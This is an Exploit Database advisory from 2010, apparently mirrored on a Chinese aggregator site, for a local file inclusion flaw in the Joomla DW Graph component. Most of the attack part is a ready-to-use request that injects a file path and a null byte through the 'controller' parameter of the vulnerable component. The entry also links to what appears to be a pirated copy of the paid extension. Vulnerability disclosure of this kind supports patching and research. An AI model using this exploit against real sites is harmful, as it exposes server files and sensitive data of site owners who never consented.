Joomla! Component DW Graph – Local File Inclusion

• Exploit Database
• 14 阅读

• 作者： Chip d3 bi0s
  日期： 2010-03-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11978/

• ---------------------------------------------------------------------------------
  Joomla Component DW Graph Local File Inclusion
  ---------------------------------------------------------------------------------
  
  Author		: Chip D3 Bi0s
  Group		: LatinHackTeam
  Email & msn	: chipdebios@gmail.com
  Date		: 31 March 2010
  Critical Lvl	: Moderate
  Impact		: Exposure of sensitive information
  Where		: From Remote
  ---------------------------------------------------------------------------
  
  Affected software description:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  
  Application	: DW Graph Component
  Developer	: DecryptWeb
  License		: GPLtype: Commercial
  Price		: $5.00 
  Date Added	: 25 March 2010
  Download	: http://shop.decryptweb.com/extensions/joomla/graph-component.html
  my gift (free)	: http://rapidshare.com/files/370201416/dwgraphs_unzipfirst.zip.html
  
  
  Description :
  
  DW Graph Component is a Joomla 1.5 native component
  for displaying graphs. With this component you can
  input numerical values with the help of CSV file and
  can show graphical representation of the input data
  in the site frontend. Various parameters can be configured
  for display of graph.
  
  ---------------------------------------------------------------------------
  
  file error	: /components/com_dwgraphs/dwgraphs.php
  
  how to exploit
  
  http://127.0.0.1/index.php?option=com_dwgraphs&controller={lfi}%00
  
  
  +++++++++++++++++++++++++++++++++++++++
  [!] Produced in South America
  +++++++++++++++++++++++++++++++++++++++